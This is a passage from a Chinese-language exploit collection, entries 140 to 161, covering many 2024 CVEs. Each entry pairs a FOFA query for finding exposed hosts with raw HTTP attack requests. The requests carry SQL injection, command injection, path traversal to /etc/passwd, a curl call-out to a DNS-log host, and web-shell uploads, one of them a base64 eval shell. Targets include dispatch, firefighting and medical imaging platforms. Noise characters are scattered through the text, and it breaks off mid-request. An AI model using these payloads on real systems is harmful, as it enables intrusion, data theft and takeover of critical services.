$ K" H; D' G2 M- J" \" K9 K$ l) |GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
! f) h( }4 O) G9 g( q3 u" PHost: x.x.x.x
" C! O' ?8 i. T. n1 Z2 S: T! j1 EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0% M! J! }* a, V b5 a& |/ ]2 F" n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' x! {- G/ ?, y/ t9 f" s
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 m1 t8 [5 ~; i
Accept-Encoding: gzip, deflate, br
7 ]5 U+ i3 x+ ~, |- F3 j: tConnection: close
; {! A' o" U# @6 w" dCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
& k, \: ]* W0 z5 [Upgrade-Insecure-Requests: 1' f& s" ^) w( w3 v, I
3 z* k' f* `9 p! {/ a. X$ S' W* L; t1 \" p
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
( e# M% \6 N! M5 _CVE-2024-2566
8 @% @8 ~3 z8 @( C; {FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
- E8 c) i* d+ e5 t- FGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1/ o; i% Y9 p0 r9 G# s0 h
Host: x.x.x.x/ y! L; l/ x* [ X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.01 g }+ I, | L- `& t9 k' B- Y$ N
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
1 c3 `# ^7 c, p2 {; B) o) @! GAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! F4 m) q, x1 E' d; K+ n& T
Accept-Encoding: gzip, deflate, br
" W$ @/ H3 K6 jConnection: close
& Y9 q% G3 t+ bCookie: authcode=h8g9" i6 A# E% F3 J1 ?( Y
Upgrade-Insecure-Requests: 1' _: P, K* h& C6 H' M, |1 J
: Z/ ~! N0 A% u& H& ^
; f% z& c- ]: g7 K/ ^9 a
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入" z2 c5 n3 y( }3 o2 s* \
FOFA:body="指挥调度管理平台", H3 q2 t/ N0 z0 j- }. z5 u! m
POST /app/ext/ajax_users.php HTTP/1.1
( |: n0 z0 W3 f( `+ [Host: your-ip8 d3 d$ `5 ^4 r% [& {3 c& k- g; z
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
7 X. C- X A2 E' JContent-Type: application/x-www-form-urlencoded" _! a% ~1 h! y
/ x- e; b. V4 u' s9 k
* B. H2 K% K0 S" {
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
) B- c; ?% e/ l, A
; u- e# e( s7 q, H$ ?/ D; V) ?8 k5 N! }5 ^. ~
142. CMSV6车辆监控平台系统中存在弱密码- {+ F. v; n( A6 _
CVE-2024-29666
8 a' e C% p) o: G' {FOFA:body="/808gps/"4 h5 u+ n' G# |; w1 u: {# r
admin/admin
" x1 _/ N0 `9 h4 h" o$ j, h143. Netis WF2780 v2.1.40144 远程命令执行
4 n4 w4 V# P8 g5 QCVE-2024-258504 [& e6 l8 Q Z; J+ I
FOFA:title='AP setup' && header='netis'; Y! C7 D* A' B
PAYLOAD/ h0 _- {& X: w9 V7 L& Q, D. U5 z3 G
$ o& z8 W, j) R0 b. f144. D-Link nas_sharing.cgi 命令注入1 n( h" T( u- E/ e, R7 b* k
FOFA:app="D_Link-DNS-ShareCenter"
+ ]- o" _( v; F0 Zsystem参数用于传要执行的命令
: G' R+ q/ r( o8 W, q% fGET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1" \' N. D! S* ^; Y! J! H6 i7 l& e+ ~, S
Host: x.x.x.x
- b7 b8 }8 K5 _4 V9 \# pUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0* e+ Z8 x$ l. r* ]/ e
Connection: close) h7 F I# g# F% X3 p
Accept: */*
- `- T2 B1 V- b6 Q) XAccept-Language: en4 X/ K$ U* n$ d& N
Accept-Encoding: gzip& h- M. r4 r9 _1 c$ R
; S/ A( d3 _% b1 d; s! Y3 S$ b
* x4 \# ]" Q$ a! Z
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入; Y& k {* s- v
CVE-2024-3400
; d# |* s4 E. \7 C) ^5 }7 c" a' vFOFA:icon_hash="-631559155"0 D0 m# i3 ?# W! D4 E' T
GET /global-protect/login.esp HTTP/1.1+ \, X/ Y- i X8 d% m) B
Host: 192.168.30.112:1005: V. }- R, t8 ^, H# e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
3 t# w& Z( N. p( M8 p" `Connection: close) p4 J7 |$ y! i. J+ B- j% f% C
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
' P* S% ^* t7 a: ~+ @9 ?6 x0 W& }9 yAccept-Encoding: gzip O/ X9 V9 a! m* z8 {$ {4 G
K! Y' Y5 v4 }, C/ i
' ~: D1 P' o, ^$ p* y- @146. MajorDoMo thumb.php 未授权远程代码执行
5 A5 `! C* `) }7 d* yCNVD-2024-02175# I; u' |4 n9 U0 O# }/ u7 }8 b0 r
FOFA:app="MajordomoSL"- f) c; I" Y& J+ B" x: p0 [* G
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
7 _' j2 l& [ PHost: x.x.x.x
1 y, K. X; C4 t8 H U( sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
6 u, S3 u/ h9 X8 ^$ I( _Accept-Charset: utf-8$ J; P/ I! A* v) [9 x \$ C
Accept-Encoding: gzip, deflate4 j: E y; ?6 j( G/ F
Connection: close, W+ E3 c7 S ~8 P5 m
/ |3 U# C! Z2 F1 c6 N' U. t3 j( n% H$ q. q
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历; T) G* Y" E8 v9 {
CVE-2024-32399
" ^) b- z6 d+ c2 b4 nFOFA:body="RaidenMAILD"! f6 v7 [" t; s+ `" }( M
GET /webeditor/../../../windows/win.ini HTTP/1.1! c1 t/ n0 O+ m
Host: 127.0.0.1:81
7 A+ `- V# @+ I$ _Cache-Control: max-age=0: i0 ` n$ q2 S8 C+ n- j
Connection: close
" d; k7 z9 w& h( n
; W# R- W( z9 V4 A9 J, Y0 ?4 ]$ g9 c3 r1 o. t# P# I% {5 F* r2 n
148. CrushFTP 认证绕过模板注入
; U% u9 ?+ S& L M4 B* l, e. mCVE-2024-4040* R2 r- i0 }. D z" B8 j- u
FOFA:body="CrushFTP"$ o; C% ]* F5 c. t; @3 j( {: `" u4 [" {
PAYLOAD
, o* m; ? M$ N0 T7 l
) d8 G& r% s6 R1 i149. AJ-Report开源数据大屏存在远程命令执行
! g' g( j# G* H8 b w0 \( {FOFA:title="AJ-Report"1 }9 r: P5 f; B$ I
3 g4 T1 }" _3 rPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
/ C B2 g/ m$ U& p U4 `Host: x.x.x.x4 H. A! O8 w' |" a) H- n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
* l) ~, e: X. _0 W- t# R$ ]Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
7 q8 N- t( j/ [, F2 JAccept-Encoding: gzip, deflate, br2 ~2 Y- x* I, o8 Z+ h2 X
Accept-Language: zh-CN,zh;q=0.9
# x- }% \; ]% n6 ?Content-Type: application/json;charset=UTF-8
% R" p: ?/ u8 P0 c* gConnection: close
% k) A& S( p; z% E6 I5 V
S- Z3 G9 l+ T# f" D+ t$ n{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
, M9 q, t$ J; r3 p! x' |( [' [* J; A/ \$ A; Z, V0 Z' D' U
150. AJ-Report 1.4.0 认证绕过与远程代码执行: f1 p# |; S' P& ]2 z
FOFA:title="AJ-Report"; \9 T- N! N( V% k* K7 I" N
POST /dataSetParam/verification;swagger-ui/ HTTP/1.17 K1 Z& Y# `+ X2 e2 W% _; k
Host: x.x.x.x
0 `/ P8 c% F7 T* {5 w/ |* h+ d" oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
: i8 S0 ?7 d4 iAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! j& k- K4 ]0 u0 _+ r/ bAccept-Encoding: gzip, deflate, br8 J _7 Z a! d) r0 ?& b
Accept-Language: zh-CN,zh;q=0.9
( \) |+ c0 ^8 Q! s' d. U4 ?' LContent-Type: application/json;charset=UTF-8
4 p! c% d1 N2 c% |6 `" gConnection: close
2 n' i4 p* @6 D( E# EContent-Length: 339
/ m: V: F: O+ C1 E8 f( t: K( Y6 k' N: ?" c& H
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
5 T2 z) u/ @) V* u
% z" j2 P& E. y% T1 P9 @
) S# B$ K: b/ Q$ l# a4 |- C# U/ h151. AJ-Report 1.4.1 pageList sql注入
5 I; w% J3 ~* l3 R3 o& sFOFA:title="AJ-Report"
$ |8 m, H! b; R8 r$ H" j1 oGET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
: ?3 X+ X! {9 T9 @4 QHost: x.x.x.x5 r6 D; y- T0 f0 I, ~3 [6 q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
' a& s8 f- F% G( P: x) h9 A& aConnection: close
T4 [2 q7 C1 l; ^8 @Accept-Encoding: gzip
+ V5 }! J: q% z y* H) n. l* }: f
# M6 G5 P- I \ [
152. Progress Kemp LoadMaster 远程命令执行
' }: J2 j, ?" s! J2 T8 j& qCVE-2024-1212
3 r- i0 K! C) y( {* F. S6 HLoadMaster <= 7.2.59.2 (GA)
' J2 M5 [" B! P6 v+ X2 O' G! e$ c, BLoadMaster<=7.2.54.8 (LTSF)' I' h4 ? @& y% p- J
LoadMaster <= 7.2.48.10 (LTS)0 r$ m7 k! m+ K' `8 m2 Z' J
FOFA:body="LoadMaster"7 P3 ]/ F- i& }3 f7 {; b( i
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码( k; ^: Q5 r i: Q% d& q9 O
GET /access/set?param=enableapi&value=1 HTTP/1.12 D3 x& S% X/ Y7 v
Host: x.x.x.x ^5 Z# m2 U# [) E4 f! y4 u
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.16 v- j6 e* L$ V. f
Connection: close8 S/ r5 j& Q9 E5 V9 O0 g2 h6 O# _
Accept: */*
+ b$ z9 r/ S" G7 zAccept-Language: en( P! ?% ^7 ]- U+ v; B
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
6 l% p7 U3 u7 k! \# CAccept-Encoding: gzip
R: g& v! o3 x& `4 x2 e' S3 [
; {+ R! Z$ G/ c! V0 {4 ^9 f7 `' N8 |9 x
153. gradio任意文件读取5 e8 ]" L8 ]5 l# L; F
CVE-2024-1561FOFA:body="__gradio_mode__"0 I O+ C; S: h! n1 {; G
第一步,请求/config文件获取componets的id9 R+ ~/ G: _+ h6 `' [& |- I& m8 y
http://x.x.x.x/config
, R, s, X3 n% R( |4 x% I! O* D" Y! Z6 E5 U! Z0 K
# K% f8 D! b* i5 }$ u" q9 K( c
第二步,将/etc/passwd的内容写入到一个临时文件
" ~+ k9 k" Y% S' Z3 ?8 b3 V. A- QPOST /component_server HTTP/1.1
6 x# L) E- |* ?. h# K: H, {4 fHost: x.x.x.x4 x7 h0 {. m% _
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3' V) n5 h V( X5 w1 { u W9 h2 ~; g
Connection: close4 D7 H8 t" U' y s
Content-Length: 115' d R" S$ s) U$ f% a
Content-Type: application/json
9 x) S, I2 p9 X4 ^Accept-Encoding: gzip) a h4 c. e1 V3 Z. R
: g& `0 v; g. F& k' T5 i7 M8 d" A{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}, e u8 v3 N- ^4 v: T5 m
3 V% r8 m7 H! p# C2 u4 R; c7 A; x8 K- t; x2 W& D
第三步访问
. Q0 i8 Q! U" y* |http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
8 B' D2 o7 Z/ m
: W1 x& }! t( V6 M+ J, K( K/ {0 J2 S' M
154. 天维尔消防救援作战调度平台 SQL注入) V* P( |' W% I. n
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入". c+ ]9 Y3 [% e4 \0 {+ y$ L
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
* \& T& T/ g7 w! x0 b+ OHost: x.x.x.x6 Q* a X* d/ R* L
Content-Length: 106
# Z* k/ r5 x7 [Cache-Control: max-age=08 H* ^- M! f J$ b8 U+ n
Upgrade-Insecure-Requests: 1
6 H2 M5 S% N. Y" @Origin: http://x.x.x.x/ j( N ?! d }, I
Content-Type: application/json' f+ J" e% q6 Q3 h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
/ w8 ~) E7 U2 ^0 J5 @6 Q, [Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Y3 f# {5 b5 q) X8 e
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
b' i; g6 |7 _1 P5 hAccept-Encoding: gzip, deflate
$ C! ~$ G# ?, ]; XAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
5 U* s6 \) {7 FConnection: close
4 r6 y( F- U" n5 J& ]2 ^0 d& _
$ v/ W s7 v/ I/ j! l& ~- L{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
* ?$ l1 o5 k8 Z. B0 u5 } J7 Q7 M+ v9 O# c0 J4 F" g
: `6 w0 k1 M8 E8 J
155. 六零导航页 file.php 任意文件上传! d8 o1 _1 e' m
CVE-2024-34982 l4 E3 T0 n/ x
FOFA:title=="上网导航 - LyLme Spage"
/ D$ c1 `% m3 \* m% v8 }POST /include/file.php HTTP/1.1
2 t- x [( \2 a4 FHost: x.x.x.x" {0 f) |( ?( A# j5 b3 ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
+ t# z; z6 ^# q" m- n3 n; AConnection: close
4 X: P( F1 s. q" ]) a1 d2 ^Content-Length: 232) G2 K- S w/ T! s& C9 U( [# x- M
Accept: application/json, text/javascript, */*; q=0.01
( x' I* h, M0 s3 w- g+ FAccept-Encoding: gzip, deflate, br( \3 b8 r' c1 x2 s2 x+ F
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 c# F6 h/ `% l
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
1 ~2 T8 g: b$ R$ v1 X% b5 VX-Requested-With: XMLHttpRequest5 B y( E8 p1 q: O
! z6 c" M8 S9 x5 G$ ?0 ^
-----------------------------qttl7vemrsold314zg0f
! T3 H# q+ b0 W$ k/ w9 dContent-Disposition: form-data; name="file"; filename="test.php"% e4 E% O; s3 f/ L# T8 M+ a
Content-Type: image/png
5 L1 m8 E7 n, S* O* }% N$ A
8 L. @) k3 _+ D& t+ T) [: o<?php phpinfo();unlink(__FILE__);?>: D/ i' X# D" v' c6 L) o& b+ }8 |; V+ K6 {
-----------------------------qttl7vemrsold314zg0f-- b% ~' X1 g! f7 e) b
$ w1 n' n# k$ [1 \
; L4 I% o- X+ s/ O& ? C访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php ~, ]+ n6 h$ O8 o* {+ P% V
& \) M# r# k, L$ Y. U3 f2 w156. TBK DVR-4104/DVR-4216 操作系统命令注入& u$ i Q, S, R. c# L/ |
CVE-2024-3721' H4 e8 v" \% c, {" K
FOFA:"Location: /login.rsp"
7 `. U! L2 a- F0 P1 F/ I; A·TBK DVR-4104
1 q) Q$ N! b" |& K$ o·TBK DVR-42161 w; g |. W: Y. I
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"- T: d) H1 O# W6 [: r
7 V- |5 z: d! A& E9 w8 m5 z
9 I+ P! l" i( w! T+ T
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1) w% r9 o$ G" X* F" R$ W" J1 l
Host: x.x.x.x
) l' p% c/ P: @( v: DUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15! ^8 v! S4 \; \6 y _6 P# _- W/ q
Connection: close: I% m' n/ z4 N0 l! L
Content-Length: 0# E' V, x6 u/ m& V4 j& M
Cookie: uid=11 q; F4 ]8 j4 [ Q1 R8 Z3 _* p/ E/ F
Accept-Encoding: gzip v; O6 [0 ~9 N: ~# w
7 v3 [% B6 ]: E0 [" N
`" O* l2 ^( P- C" o157. 美特CRM upload.jsp 任意文件上传) E4 N5 V% w% ~0 V! L0 W/ E/ E
CNVD-2023-06971 A; F4 S) M+ f( I! K0 `
FOFA:body="/common/scripts/basic.js") `" Z8 j4 J3 |% t" T* _. `
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
U% x6 a+ d. L( G' i O- NHost: x.x.x.x
; I: n' a( f8 SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
& _. | u" I" \3 ?# K3 wContent-Length: 709' x1 b+ [- A- m$ f0 a7 h3 D8 D' c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.72 ~* z7 l$ L7 Z5 _
Accept-Encoding: gzip, deflate
! s) J, z5 L/ {; S8 VAccept-Language: zh-CN,zh;q=0.97 B) @5 q4 J) f
Cache-Control: max-age=0
" J: \' U: g. C( LConnection: close8 k k3 l! x, K5 Q0 u
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN( _+ U# P. A3 j6 v& ?) l
Upgrade-Insecure-Requests: 1
# V# Z* ~8 S7 B. F$ G* M6 O3 N9 j" a! Y( W0 s# I, @6 h! A% n
------WebKitFormBoundary1imovELzPsfzp5dN- u# z" V6 _' Z# n% W
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
: F t3 k1 X% @. [, RContent-Type: application/octet-stream
7 R1 [2 q; s3 t- E3 }
: I2 E2 ~9 V t. r% Inyhelxrutzwhrsvsrafb
2 e6 y* C7 v+ \; ] ~; D- k------WebKitFormBoundary1imovELzPsfzp5dN$ ]8 n; H% |( j4 H
Content-Disposition: form-data; name="key"* f, W" L6 y% d/ r
0 }/ H" \3 K6 W1 lnull& O5 d8 ^! `9 v" E; ^+ Z' r6 n) j
------WebKitFormBoundary1imovELzPsfzp5dN r$ A0 V0 X0 f
Content-Disposition: form-data; name="form"7 ]" X j1 T* b; i
) l( B7 L# M0 }# h% _, C) ?- {, a; z
null5 i- e8 u' \9 ^, m! g. O
------WebKitFormBoundary1imovELzPsfzp5dN
% o) Y ?$ w Y' r% ?Content-Disposition: form-data; name="field"2 n$ ^% d+ t7 {' h, T ?* A
f3 U8 A0 H, T+ dnull
8 `' z% ~( V8 V, o7 G- i- J2 r# C------WebKitFormBoundary1imovELzPsfzp5dN
# Y7 ?' l4 ?* | o) M( ] }Content-Disposition: form-data; name="filetitile"
, y' U& q8 ?8 O! l$ o X2 o5 N8 @2 G- I4 @) t. u4 N
null
' ~/ A+ U5 k8 p4 l3 Z------WebKitFormBoundary1imovELzPsfzp5dN
; V! E9 n* f$ p3 g+ UContent-Disposition: form-data; name="filefolder"
: R( N, f6 m( z( K1 u6 `) t! t6 z6 c- A' d
null* U5 l9 o6 a, C8 Q0 G: Y* S
------WebKitFormBoundary1imovELzPsfzp5dN--
# l l9 B5 t f' e7 L5 r0 a# C5 t7 _# [6 ?
9 d/ j3 j, ] a/ W: Y2 K4 K
! I/ l! s4 q9 F1 @http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp! m, E/ F8 M8 @$ {+ V: W
* y$ \" k$ V$ d158. Mura-CMS-processAsyncObject存在SQL注入' B+ m2 X% J5 a/ w
CVE-2024-326404 K `% ^! s/ {9 x8 d* y4 Z
FOFA:"Generator: Masa CMS"
; n- u6 M- k5 X3 f2 Z, bPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
9 o( a: E, B$ J: R8 AHost: {{Hostname}}2 `; K1 [. J0 T4 H
Content-Type: application/x-www-form-urlencoded$ C3 z. w @: {$ _2 ~* {; v
6 z/ n- N* z' R& B$ A6 F4 ]- Sobject=displayregion&contenthistid=x\'&previewid=1
1 B" s( w( T7 O1 Z* M6 C4 L9 `6 `3 j% X
. @ x7 [: I- [5 m: i! I159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
, @' N8 X6 x" b2 S, Y: I! BFOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
" Y: t7 k! t9 }" G5 A! z1 JPOST /webservices/WebJobUpload.asmx HTTP/1.1, U. V1 `7 N$ Y9 y- C
Host: x.x.x.x X% a; z( i- ~ C+ a- q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
2 m* a7 ?5 [$ A' v1 xContent-Length: 1080
& K1 _) q [; Y4 Y4 n' w% {Accept-Encoding: gzip, deflate$ h& I+ q4 B9 G! D+ W5 ^# X
Connection: close
* C$ {: v3 w, l$ D' ~" v. J, MContent-Type: text/xml; charset=utf-8
/ ]. ~# z2 x- w% ~% S) X- ^! i- e* LSoapaction: "http://rainier/jobUpload"
, U4 d. C! Q! ~ T$ ]! N- M. [- x8 A: T l$ x# Y) z3 G, o
<?xml version="1.0" encoding="utf-8"?>% ^% G$ f4 I- c( Q1 [7 i4 p
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
* b. I1 y \# d' ^<soap:Body>
1 s$ s/ I# r3 R4 W' a* D<jobUpload xmlns="http://rainier">& f: S9 O) Z/ E
<vcode>1</vcode>8 E- i8 B, W" G% Y' h
<subFolder></subFolder>$ t0 n* r( t( B7 a4 ^1 Z9 }' B
<fileName>abcrce.asmx</fileName>
3 L& D9 S0 I8 [ q& Q# ?7 g" l% d<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
4 `! x5 t1 O! \. d3 g( W R</jobUpload>- \/ x" I, t; t/ D1 a9 d
</soap:Body>9 A3 e& @( Q; v* r3 T( I
</soap:Envelope>+ j( E2 T+ [6 a4 f/ G
# M1 p3 }& d: v& N( }& X- x
0 A) h: y* D2 j T: D
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")7 N1 |4 l- o4 Y* b
% x' s' F# [1 W$ E* v" Y t1 W
. ^" F" P6 Q( D, H0 T1 u160. Sonatype Nexus Repository 3目录遍历与文件读取& [+ L; D- a2 I) i
CVE-2024-4956
# b( p9 f) y4 Q1 L" B; WFOFA:title="Nexus Repository Manager"* Q1 S5 ?% `2 M" C
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
+ m, P/ M G, q2 s# P7 O# fHost: x.x.x.x
, c3 g7 g' v4 b* E( eUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
# e, C3 T: w, a% Y" H! NConnection: close! ~! V) Z" N2 J) k1 U
Accept: */*
; a4 H7 G' e4 W: x, l) g# p$ CAccept-Language: en
% E9 A5 B6 N# G! |% bAccept-Encoding: gzip7 z: J9 r) O8 ]3 c! o
, T6 u3 T0 Y3 p S4 Y: E1 G% F5 T: q ?: c: `
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
+ y5 ~3 |( X# U @FOFA:body="/KT_Css/qd_defaul.css"
7 @2 L6 I$ P7 J第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密
/ B. B- n& `6 d7 A2 x- vPOST /Webservice.asmx HTTP/1.12 x) p& G) |5 q$ J: b
Host: x.x.x.x
( b$ [1 }$ A* m, j/ C. ?3 a @$ QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36 Y. l. T& C) V3 @9 b; M$ z
Connection: close
/ J$ g# F; o% a# `( o% s# uContent-Length: 445: L0 Z m" e* u3 a4 ]* Y+ M
Content-Type: text/xml
- l' N8 |0 x0 S$ }" H* H. ^9 @# Y! lAccept-Encoding: gzip
4 b' M3 b4 d$ r; j1 L) |- Z5 N4 ?7 q: P8 D9 E0 f8 d" c" Z5 E8 Q
<?xml version="1.0" encoding="utf-8"?>, ]: ]$ {- ?& W' a
<soap:Envelope xmlns:xsi="; b5 x& V# B, C$ E% f
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
0 e- G! j& U7 A; a. Y3 N9 E) oxmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">. i4 E& J0 ]/ Q3 ~# h5 ~
<soap:Body>% _/ h3 j# v5 x6 T i7 n! x* ~
<UploadResume xmlns="http://tempuri.org/">& H$ X+ {% F& r$ O& e/ l
<ip>1</ip>
